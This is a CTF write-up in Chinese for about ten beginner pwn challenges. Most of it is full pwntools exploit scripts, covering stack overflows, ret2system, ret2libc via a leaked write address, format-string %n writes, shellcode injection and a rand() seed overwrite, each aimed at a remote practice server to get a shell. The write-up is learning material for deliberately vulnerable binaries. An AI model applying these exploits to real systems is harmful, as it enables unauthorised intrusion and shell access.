get-shell
此题是经典入门题,没有设置任何漏洞,直接给了shell
直接nc连上,然后ls,最后cat flag即可
hello_pwn
发现只要让dword_60106C == 1853186401就可以拿到flag
read函数将把数据读入unk_601068中,要想办法让数据覆盖到dword_60106C,所以查看两个数据内存
计算距离为4,写个exp即可
from pwn import *
p = remote('111.200.241.244', '56851')
p.recvuntil(b" ~~ ")
p.recvuntil(b"bof\n") #puts会自动换行
payload = b'a' * 4 + p64(0x6E756161)
p.sendline(payload)
p.interactive()
p.recvuntil有没有都行
level0
main函数很简单,看到read,猜测是溢出题
然后找到了这个函数
去数据里看看
r是return address,所以只要让函数返回的地方ip是callsystem的地址就行了
计算记录 128 + 8 = 136
写出exp
from pwn import *
p = remote('111.200.241.244', '56851')
payload = b'a' * 136 + p64(0x400596)
p.sendline(payload)
p.interactive()
level2
进去主函数,发现read,应该还是溢出题
但是并没有找到获取shell的system,这题要自己设置
先找到bin/sh的位置
再看看数据的位置
计算距离
136 + 4 = 140
exp如下
from pwn import *
p = remote('', '')
e = ELF("./level2")
sysaddr = e.symbols['system']
payload = b'a' * 140 + p32(sysaddr) + p32(0) + p32(0x0804A024)
p.sendline(payload)
p.interactive()
或者
from pwn import *
p = remote('111.200.241.244', '63389')
e = ELF("./level2")
sysaddr = e.symbols['system']
binsh_addr = next(e.search(b'/bin/sh'))#拿到字符串的地址
payload = b'a' * 140 + p32(sysaddr) + p32(0) + p32(binsh_addr)
p.sendline(payload)
p.interactive()
为什么会有一个p32(0),因为栈中的结构如图
函数返回地址随便覆盖一个就行了,因为system函数已经执行完了,无所谓地址返回哪里
参数一应该覆盖为/bin/sh
这样才可以实现systtem(/bin/sh)
string
废话连篇的一道题,还是得找到关键函数的关键位置
main函数
sub_400D72函数
sub_400CA6函数
红色框框中的是把v1强制转换成函数指针然后执行,所以只要把shellcode写到v1里面就可以了
所以想要执行shellcode就得让a1[0] = a1[1]
从主函数可以得知*a1是68,a1[1]是85
要想办法让*a1变成85
在sub_400CA6函数上面有个sub_400BB9函数
很明显存在格式化字符串漏洞,用%K$n赋值就可以了
不过要先用%p去找偏移的距离
发现偏移距离为7
写出exp
from pwn import *
context(os = 'linux', arch='amd64')
p = remote('111.200.241.244', '51063')
p.recvuntil(b'secret[0] is ')
addr = int(p.recvuntil(b'\n')[:-1],16) #换行符要去掉,所以是[:-1]
print(addr)
p.recvuntil(b'name be:\n')
p.sendline(b'gxh191')
p.recvuntil(b'up?:\n')
p.sendline(b'east')
p.recvuntil(b'leave(0)?:\n')
p.sendline(b'1')
p.recvuntil(b'address\'\n')
p.sendline(str(addr).encode())
p.recvuntil(b"And, you wish is:\n")
payload=b"%085d%7$n"
p.sendline(payload)
p.recvuntil(b'SPELL\n')
p.sendline(asm(shellcraft.amd64.linux.sh()))
p.interactive()
guess_num
题目意思就是猜数字,连续十次就给成功,然后sub_C3E函数里面就是cat flag
数字是随机数,但其实是伪随机数,是根据seed来生成的,所以知道seed,就结束了
所以我们可以控制利用gets(v7)来进行栈溢出,从而控制seed,看看栈中的情况
var_30是v7,偏移距离为0x20
exp如下
from pwn import *
from ctypes import *
p = remote('111.200.241.244','53905')
payload = b'a' * 0x20 + p64(1)
c = cdll.LoadLibrary("/lib/x86_64-linux-gnu/libc.so.6")#可以用ldd找对应的库
c.srand(1)
p.recvuntil(b'name:')#printf不会自动加\n,所以不用加上
p.sendline(payload)
for i in range(10):
p.recvuntil(b"number:")
p.sendline(str(c.rand() % 6 + 1).encode())
p.interactive()
然后就可以得到flag
int_overflow
两个read函数都没得溢出
进check看看
发现v3是八位无符号数,可以实现溢出,只要溢出之后长度大于3小于等于8就行了
可以令输入的长度为260,溢出之后为4,符合条件
最后输入的内容会通过strcpy给到dest,进去看看偏移距离
为0x18,十进制为24
shift+f12可以找到cat flag,进去看是一个函数
地址为0x0804868B
exp如下
#! /usr/bin/env python3
from pwn import *
p = remote('111.200.241.244', '61220')
payload = b'a' * 0x18 + p32(0x0804868B)
payload += (260 - len(payload)) * b'a'
p.sendlineafter(b'choice:', b'1')
p.sendlineafter(b'username:\n', b'gxh191')
p.sendlineafter(b'passwd:\n', payload)
p.interactive()
cgpwn2
前面都是不重要的东西,就看这两个gets就行,name在bss段,可读可写,所以把/bin/sh\x00传进去就行了,然后利用s进行栈溢出就行了,跟前面的题没啥区别
exp如下
from pwn import *
p = remote('111.200.241.244', '64417')
p.sendlineafter(b'your name\n', b'/bin/sh\x00')
e = ELF("./cgpwn2")
sysaddr = e.symbols['system']
payload = b'a' * 0x2A + p32(sysaddr) + p32(0) + p32(0x0804A080)
p.sendlineafter(b'message here:\n', payload)
p.interactive()
level3
只有一个栈溢出和libc,可以利用write泄露write的真实地址,然后减去libc中的距离,就可以得到libc的offset,从而利用基址加偏移的方式就能得到system的地址和/bin/sh的地址
libc动态库中的write函数和system函数距离有多远,链接之后他们的距离就有多远,也就是offset都是一样的
真实地址 = libc中的函数基址 + 相同的offset
exp如下
#! /usr/bin/env python3
from pwn import *
p = remote('111.200.241.244', '57487')
elf=ELF('./level3')
libc=ELF('./libc_32.so.6')
write_plt = elf.plt['write']
write_got = elf.got['write']
main_addr = elf.symbols['main']
write_libc = libc.symbols['write']
sys_libc = libc.symbols['system']
sh_libc = next(libc.search(b'/bin/sh'))
payload = b'a'*140 + p32(write_plt) + p32(main_addr) + p32(1) + p32(write_got) + p32(4)
p.sendlineafter(b"Input:\n",payload)
write_got_addr = u32(p.recv()[:4])
offset = write_got_addr - write_libc
sys_addr = offset + sys_libc
bin_sh_addr = offset + sh_libc
payload0 = b'a'*140 + p32(sys_addr) + p32(1) + p32(bin_sh_addr)
p.sendlineafter(b"Input:\n", payload0)
p.interactive()
CGfsb
很明显是一个格式化字符串漏洞,利用printf即可
偏移为8,name写入的是中间位置,这里要记得写两个a来补齐
exp如下
#! /usr/bin/env python3
from pwn import *
p = remote('111.200.241.244', '52273')
p.recvuntil(b'name:\n')
name = b'aa' + p32(0x0804A068)
p.sendline(name)
p.recvuntil(b"please:\n")
payload=b"%08d%8$n"
p.sendline(payload)
p.interactive()